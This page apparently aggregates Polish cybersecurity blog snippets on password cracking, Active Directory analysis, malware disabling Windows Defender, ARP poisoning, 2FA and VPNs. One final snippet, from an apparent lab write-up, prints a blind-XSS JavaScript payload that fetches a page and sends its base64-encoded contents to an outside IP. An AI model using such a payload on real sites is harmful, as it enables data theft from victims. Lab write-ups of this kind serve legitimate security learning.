Serwisy SEC

Łamanie haseł online - nowa usługa + próbki łamania haseł dla md5 i sha256

Łamanie haseł online - nowa usługa + próbki łamani...

blaszczakm.blogspot.com 3 years ago Uruchomiłem dla Was możliwość łamania haseł on-line na moich urządzeniach. Zbudowałem 4 komputery obliczeniowe złożone z: 1) 10 x GPU RX 6600 XT 2) 10 x GPU RX 6600 XT 3) 3 x GPU RX 6600 i 3 x...
AudioCast M5 stream music from linux/windows

AudioCast M5 stream music from linux/windows

blaszczakm.blogspot.com 3 years ago 1) set music: http://192.168.51.173/httpapi.asp?command=setPlayerCmd:play:http://192.168.51.5/music/mata.mp32) loop(1)/or noloop(0)http://192.168.51.173/httpapi.asp?command=setPlayerCmd:loopmode:13) listen radio internet http://192.168.51.173/httpap...
Koncepcja Zero Trust w ochronie danych, J.Niedziałkowski/Z.Szmigiero/IBM

Koncepcja Zero Trust w ochronie danych, J.Niedział...

youtube.com 3 years ago Zapraszamy do obejrzenia prezentacji Jacka Niedziałkowskiego i Zbigniewa Szmiegiero z IBM Polska "Koncepcja Zero Trust w ochronie danych", którą omówiona podczas SECURE 2021.
BloodHound – analiza infrastruktury AD cz. 1

BloodHound – analiza infrastruktury AD cz. 1

how2hax.pl 3 years ago Wstęp W ostatnim wpisie obiecałem opowiedzieć nieco o narzędziach przydatnych przy pracy z infrastrukturą IT opartą o Active Directory. Chciałbym w najbliższym czasie skupić się na następujących rozwiązaniach: BloodHound Ping Castle PowerSploit (modu...
Przyszłość ochrony fizycznej (czy taka jest?)

Przyszłość ochrony fizycznej (czy taka jest?)

sasmaczyliblogbezpiecznika.blogspot.com 3 years ago Jesień zawsze sprzyja branżowym spotkaniom, to tradycyjnie okres konferencji czy też imprez branży security.Tej jesieni tematem przewodnim była przyszłość ochrony fizycznej, sytuacja związana z COVID-19, co spowodowało dodatkową motywację by ten tem...
Podsumowanie CYBERSEC CEE Regions & Cities 2021

Podsumowanie CYBERSEC CEE Regions & Cities 2021

cybersecforum.eu 4 years ago Za nami jedna z najbardziej wpływowych konferencji w Europie w obszarze cyberbezpieczeństwa i nowych technologii – CYBERSEC CEE Regions & Cities 2021. W ciągu trzech dni wypełnionych ponad 60 różnymi formatami angażującymi przeszło 200 ekspertów ...
Rosja jest odpowiedzialna za "niszczycielskie" ataki ransomware

Rosja jest odpowiedzialna za "niszczycielskie" ata...

osluzbach.pl 4 years ago Cyberataki, w których hakerzy dostają się do sieci komputerowych i blokują właścicieli, dopóki nie zapłacą okupu, stanowią "największe zagrożenie" dla brytyjskich firm w cyberprzestrzeni, ostrzegła szefowa Narodowego Centrum Cyberbezpieczeństwa (NCSC...
Cyberbezpieczeństwo polskich firm 2021

Cyberbezpieczeństwo polskich firm 2021

arcabit.pl 4 years ago Jak polskie firmy podchodzą do zagadnień związanych z cyberbezpieczeństwem? Jakie są główne zagrożenia dla ciągłości biznesu i jakie zabezpieczenia są najpopularniejsze i najczęściej stosowane? Zapraszamy do lektury najnowszego raportu o bezpieczeńst...
O czym pamiętać konfigurując router

O czym pamiętać konfigurując router

bezpieczny.blog 4 years ago Na przeczytanie potrzebujesz 9 minut(y). Dzisiejsze routery domowe to skomplikowane urządzenia. Mają wiele różnych funkcji, które często chowają się za zagadkowymi akronimami. Postaram się wyjaśnić działanie najpopularniejszych funkcji oraz doradzić,...
Zielona energia zelektryzuje Twoje serwery

Zielona energia zelektryzuje Twoje serwery

dataspace.pl 4 years ago Serwerownie również dostosowują się do wymagań ekologicznych. Sprawdźmy jak!.
Automatyczne wykrywanie dowolnego ciągu znaków (klucze api, hasła, komunikaty o błędach) – RegexFinder

Automatyczne wykrywanie dowolnego ciągu znaków (kl...

my127001.pl 4 years ago BurpSuite mimo bycia najlepszym narzędziem do testów penetracyjnych web aplikacji, z jakim dane mi było pracować, posiada przez cały czas obszary, do rozwoju. Niedawno został on uzupełniony w moduł "Logger", który de facto działa tak samo co wtyczka ...
Jak zostać etycznym hakerem? Gość: Maciej Cieśla - POIT 131

Jak zostać etycznym hakerem? Gość: Maciej Cieśla -...

feeds.buzzsprout.com 4 years ago Witam w sto trzydziestym pierwszym odcinku podcastu "Porozmawiajmy o IT". Tematem dzisiejszej rozmowy jest to jak zostać etycznym hakerem.Dziś moim gościem jest Maciej Cieśla – Head of Cybersecurity Program w HackerU. Specjalista cyberbezpieczeństwa,...
Aplikacja miejska z AMD Epyc – case study qb-mobile

Aplikacja miejska z AMD Epyc – case study qb-mobil...

dataspace.pl 4 years ago Przeczytaj jak zadbaliśmy o to, żeby aplikacja miejska z której być może korzystasz, działała zawsze sprawnie i szybko.
Red Teaming Gitbook Notes

Red Teaming Gitbook Notes

blaszczakm.blogspot.com 4 years ago Przydaje się podczas red teamingu https://kwcsec.gitbook.io/the-red-team-handbook/
SamSite Cookie

SamSite Cookie

blaszczakm.blogspot.com 4 years ago SameSite=None— plik cookie jest wysyłany we "wszystkich kontekstach" — mniej więcej tak, jak działały rzeczy przed wynalezieniem SameSite. SameSite=Strict—plik cookie jest wysyłany tylko w przypadku żądań pochodzących z tej samej domeny. choćby wch...
15 polskich blogów, stron, podcastów i kanałów na YouTube o bezpieczeństwie w sieci

15 polskich blogów, stron, podcastów i kanałów na ...

kwestiabezpieczenstwa.pl 4 years ago Skąd zdobywać wiedzę o bezpieczeństwie w sieci? Subiektywna lista 15 świetnych polskich źródeł wiedzy dla wszystkich: Blogi, serwisy, podcasty, kanały YouTube.
FFUF i EyeWitness – przyśpieszenie procesu wyszukiwania

FFUF i EyeWitness – przyśpieszenie procesu wyszuki...

my127001.pl 4 years ago Sytuacja wygląda następująco — FFUF znalazł kilkadziesiąt/kilkaset "ukrytych" zasobów. Możesz manualnie kopiować adresy do przeglądarki, żeby sprawdzić każdy z nich pod kątem ciekawych wyników albo nieco zautomatyzować cały proces. Polecam to drugie ...
Trendy w cyberbezpieczeństwie na rok 2021. Gość: Grzegorz Bąk - POIT 126

Trendy w cyberbezpieczeństwie na rok 2021. Gość: G...

feeds.buzzsprout.com 4 years ago Witam w sto dwudziestym szóstym odcinku podcastu "Porozmawiajmy o IT". Tematem dzisiejszej rozmowy są trendy w cyberbezpieczeństwie na rok 2021.Dziś moim gościem jest Grzegorz Bąk – Product Development Manager w Xopero Software, związany z backupem d...
Używamy managera haseł

Używamy managera haseł

bezpieczny.blog 4 years ago Na przeczytanie potrzebujesz 5 minut(y). Według przeprowadzonego w 2020 roku badania przeciętny użytkownik Internetu wykorzystuje około 100 haseł, by logować się do mediów społecznościowych, sklepów internetowych czy serwisów streamingowych. Co zrobi...
Lista złośliwych domen CERT Polska, Mateusz Szymaniec CERT Polska/NASK

Lista złośliwych domen CERT Polska, Mateusz Szyman...

youtube.com 4 years ago Podczas prezentacji omówimy sposób działania prowadzonej przez nas listy domen stron wyłudzających dane internautów. Pokażemy skąd pozyskujemy informacje na temat złośliwych treści, jak je weryfikujemy i jakie systemy stworzyliśmy do wsparcia tego pr...
Jak prosto wirusy rozbrajają zabezpieczenia Windows 10?

Jak prosto wirusy rozbrajają zabezpieczenia Window...

payload.pl 4 years ago Tak prosto, iż czasem aż ciężko uwierzyć. W tym, wydawać by się mogło, zamkniętym systemie, niemal każdym aspektem bezpieczeństwa da się sterować poprzez jakieś API - tak aby każdy aspekt mógł być punktowo wyłączony i obsłużony przez komercyjne oprog...
Jak się nie da, jak się da — Windows 11

Jak się nie da, jak się da — Windows 11

dariusz.wieckiewicz.org 4 years ago Większość z nas na pewno słyszała o wymaganiach dla Windows 11, o ile chodzi o sprzęt. Spora część użytkowników rozczarowała się, sprawdzając, czy będą mogli zaktualizować swój sprzęt do najnowszego systemu od Microsoftu. Ale… jak się nie da, jak się...
Kolejny certyfikat VB100 dla Arcabit

Kolejny certyfikat VB100 dla Arcabit

arcabit.pl 4 years ago Magazyn Virus Bulletin opublikował wyniki kolejnej serii testów systemu ochronnego, tym razem przeprowadzonych według nowej, bardziej restrykcyjnej procedury. Pakiet Arcabit Internet Security bez trudu osiągnął maksymalny wyniki. Oto zestawienie wyni...
Weryfikacja dwuetapowa (2FA): Jak zabezpieczyć konta w internecie dzięki uwierzytelniania dwuskładnikowego?

Weryfikacja dwuetapowa (2FA): Jak zabezpieczyć kon...

kwestiabezpieczenstwa.pl 4 years ago Weryfikacja dwuetapowa (2FA) - wszystko o uwierzytelnianiu dwuskładnikowym. Porównanie metod: e-mail, kody SMS, kody czasowe w aplikacji, klucz U2F. Co wybrać i jak zabezpieczyć konta? Sprawdzam!
Arcabit chroni Windows 11

Arcabit chroni Windows 11

arcabit.pl 4 years ago Microsoft zaprezentował nową wersję systemu Windows 11. Pakiet Arcabit pracuje w nowym systemie bez zarzutu. Maszyny z Windows 11 dołączyły do naszej farmy komputerów testowych Pierwsze spojrzenie na Windows 11: Arcabit zainstalowany, aktywny, gotowy...
Jak wirusy wyłączają filtr SmartScreen?

Jak wirusy wyłączają filtr SmartScreen?

payload.pl 4 years ago Filtr SmartScreen wbudowany w Windows 10 pomaga chronić komputer przed złośliwymi stronami, oraz już pobranym złośliwym oprogramowaniem. Pomaga, dopóki nie zostanie przez takie oprogramowanie wyłączony. W tym artykule pokażemy, jak to robi realny wir...
CFP Secure 2021

CFP Secure 2021

cert.pl 4 years ago Rozpoczynamy poszukiwanie prelegentów na tegoroczną edycję konferencji SECURE. Należysz do ludzi, którzy cenią sobie ciężką pracę i mierzenie się z wyzwaniami? Chcesz spotkać podobnych sobie zapaleńców, podzielić się wynikami pracy, poszukać inspirac...
Ciekawe linki [aktualizacja 27.06.2022]

Ciekawe linki [aktualizacja 27.06.2022]

payload.pl 4 years ago W tym zbiorczym artykule publikujemy zbiór linków do narzędzi, tekstów i innych materiałów, które naszym zdaniem są warte przeczytania i mieszczą się w tematyce PAYLOAD, ale nie znajdziemy czasu w poświęcenie im osobnych artykułów.
#024: Nasze backupy

#024: Nasze backupy

bezpieczny.blog 4 years ago Na przeczytanie potrzebujesz < 1 minutę. Ludzie dzielą się na tych, co robią backupy i na tych, co będą je robić ? Jest wiele różnych metod robienia backupów. Niektóre prostsze, niektóre trudniejsze, mniej lub bardziej paranoiczne. W tym odcinku.....
Winget – aktualizacja systemu innych firm jak Microsoft

Winget – aktualizacja systemu innych firm jak Micr...

antynet.pl 4 years ago Automatyczna aktualizacja systemu innych firm jak Microsoft to bez wątpienia pozytywne naśladownictwo rozwiązań rodem z Linux. Uruchamiamy cmd jako administrator i wykonujemy polecenie: winget upgrade –all Fajna sprawa 😉.
DNS: co to jest? Jak działa? Jak wybrać i zmienić DNS na bezpieczne?

DNS: co to jest? Jak działa? Jak wybrać i zmienić ...

kwestiabezpieczenstwa.pl 4 years ago Co to są serwery DNS? Jak działają? Co mają wspólnego z bezpieczeństwem, prywatnością i cenzurą w sieci? Jak wybrać i zmienić DNS-y?
Jak wirusy wyłączają Windows Defendera?

Jak wirusy wyłączają Windows Defendera?

payload.pl 4 years ago Pewnie niejednokrotnie czytałeś artykuły o tym, iż Windows Defender jest najlepszym (czy wręcz jedynym potrzebnym) programem antywirusowym, bo jest ściśle zintegrowany z Windows. A z drugiej strony teksty, iż antywirusy komercyjne biją go na głowę. K...
Cyfrowa suwerenność Europy. Gość: Marcin Zmaczyński - POIT 116

Cyfrowa suwerenność Europy. Gość: Marcin Zmaczyńsk...

feeds.buzzsprout.com 4 years ago Witam w sto szesnastym odcinku podcastu "Porozmawiajmy o IT". Tematem dzisiejszej rozmowy jest cyfrowa suwerenność Europy.Dziś moim gościem jest Marcin Zmaczyński – Head of Marketing CEE w Aruba Cloud. Doświadczony manager odpowiedzialny za rozwiązan...
ARP poisoining + AS-REQ cracking

ARP poisoining + AS-REQ cracking

how2hax.pl 4 years ago Dzień dobry. Dziś chciałbym poruszyć temat bezpieczeństwa sieci lokalnych i pokazać jeden z kilku tzw. low-hanging fruits, po które łatwo sięgnąć gdy znajdziemy się już w interesującym dla nas segmencie sieci: LLMNR NBNS (NetBIOS Name Service) ARP po...
Fastify + Hotwire - nowy (lepszy?) pomysł na frontend

Fastify + Hotwire - nowy (lepszy?) pomysł na front...

fsgeek.pl 4 years ago Obstawiam, iż 90% aktualnie tworzonych aplikacji opiera się na podział frontend, backend i przesył danych pomiędzy nimi w postaci JSON'a. Frontend prosi o dane i gdy je otrzymuje, to odpowiednio modyfikuje wygląd strony. A może można przesyłać coś in...
Planujemy wielki atak – wstęp

Planujemy wielki atak – wstęp

payload.pl 4 years ago Tym artykułem rozpoczynamy nowy cykl, w którym objaśnimy krok po kroku, w jaki sposób zabrać się za zaatakowanie i wyprowadzenie danych z większej firmy - ale zanim przejdziemy do konkretów, musimy sobie wyjaśnić kilka podstawowych spraw.
Czemu, jak wpisuję błędne hasło przy logowaniu do banku, system nie wyświetla błędu?

Czemu, jak wpisuję błędne hasło przy logowaniu do ...

bezpieczny.blog 4 years ago Na przeczytanie potrzebujesz 3 minut(y). Nasza czytelniczka Magda (imię zmienione) korzysta z bankowości internetowej jednego z polskich banków. Zgodnie z naszymi radami używa skomplikowanego, unikalnego hasła i dwuskładnikowego uwierzytelnienia(PUSH...
Co to jest VPN? 8 porad jak wybrać VPN, aby być bezpiecznym w Sieci

Co to jest VPN? 8 porad jak wybrać VPN, aby być be...

kwestiabezpieczenstwa.pl 4 years ago Kompendium wiedzy o VPN: Co to jest? Jak działa? Dlaczego warto używać VPN? Jak wybrać odpowiedni VPN? + dodatkowo moja rekomendacja najlepszego VPN-a.
Eskalacja uprawnień: CVE-2019-1315 + CVE-2020-1170

Eskalacja uprawnień: CVE-2019-1315 + CVE-2020-1170...

how2hax.pl 4 years ago Cześć ? Poniższy wpis stanowi kontynuację poprzedniego artykułu o Windows Defenderze. W poprzednim artykule udało się nam doprowadzić do sytuacji w której możemy swobodnie usuwać zawartości wybranych przez nas folderów. W tym odcinku postaramy się pó...
Nowa wersja programu Arcabit

Nowa wersja programu Arcabit

arcabit.pl 4 years ago Trochę to trwało, mnóstwo programisto-testero-roboczogodzin upłynęło, ale już jest - całkowicie nowa wersja programu Arcabit.Udostępniliśmy również mechanizm szybkiej, automatycznej migracji do najnowszej wersji. Zachęcamy do zapoznania się z nową we...
10 lat więzienia dla cyberprzestępcy z grupy FIN7

10 lat więzienia dla cyberprzestępcy z grupy FIN7

bothunters.pl 4 years ago Wydano wyrok na 35-latka pochodzenia ukraińskiego, który był członkiem zorganizowanej grupy cyberprzestępczej FIN7. Wyrok to 10 lat pozbawienia wolności. Dodatkowo sędzia nakazał zapłacić 2,5 miliona dolarów odszkodowania. Grupa, w której uczestniczy...
Co z Rębaczami?

Co z Rębaczami?

rebacze.pl 4 years ago Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Co z Rębaczami?

Co z Rębaczami?

rebacze.pl 4 years ago Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Co z Rębaczami?

Co z Rębaczami?

rebacze.pl 4 years ago Co jakiś czas dostaję pytania – a co z Rębaczami? Odpowiadając krótko – na razie projekt jest w zawieszeniu, bo rozważam zmianę formuły. Ale – jak zwykle – wyjdzie w ….
Sprawdź, czy wyciekł twój telefon

Sprawdź, czy wyciekł twój telefon

rebacze.pl 4 years ago W weekend świat obiegła informacja, iż dostępna komercyjnie (i w darknecie) baza danych użytkowników Facebooka, zawierająca 533 milionów rekordów, została umieszczona za darmo w sieci. Zawierająca podstawowe informacje użytkowników baza ….
Rozmowa kontrolowana #53. Wywiad dla Z3S

Rozmowa kontrolowana #53. Wywiad dla Z3S

randomseed.pl 4 years ago W świąteczną niedzielę redaktorzy serwisu Zaufana Trzecia Strona – Adam Haertle i Adam Lange – przeprowadzili wielotematyczną rozmowę z Pawłem Wilkiem. Można posłuchać i pooglądać odpowiedzi dotyczących programowania zorientowanego na dane, eDiscover...
Menedżer haseł: wszystko, co musisz wiedzieć o bezpiecznym zarządzaniu hasłami

Menedżer haseł: wszystko, co musisz wiedzieć o bez...

kwestiabezpieczenstwa.pl 4 years ago Jak zabezpieczyć swoje hasła przy pomocy menedżera haseł? Jak działają menedżery, co oferują, jak ich używać, który wybrać? Sprawdzam.
Infrastruktura IT dla Domu Maklerskiego – case study Navigator S.A.

Infrastruktura IT dla Domu Maklerskiego – case stu...

dataspace.pl 4 years ago Sprawdź jakie środowisko IT przygotowaliśmy dla jednego z największych graczy w branży finansowej.
Handling Celery events (EN)

Handling Celery events (EN)

vilya.pl 4 years ago The code used in this article was written for Celery 5.0.5 but it should work with older versions as well (4.1.1 and higher). It’s available on GitHub. According to the Celery official documentation, a worker is able to generate...
Blind XSS Data Exfiltration

Blind XSS Data Exfiltration

blaszczakm.blogspot.com 4 years ago cat 2.js var xhr=new XMLHttpRequest(); xhr.open("GET", 'http://gym-club..htb/security_threat/report.php', false); xhr.send();var xhr2=new XMLHttpRequest(); xhr2.open("GET", "http://10.10.14.121/aaaa?=" + btoa(xhr.responseText), false); xhr2.send(); └...
English (US) English (US) · Polish (PL) Polish (PL) · Russian (RU) Russian (RU) ·
Kontakt · Regulamin · O nas ·

© Poland 2025. All rights are reserved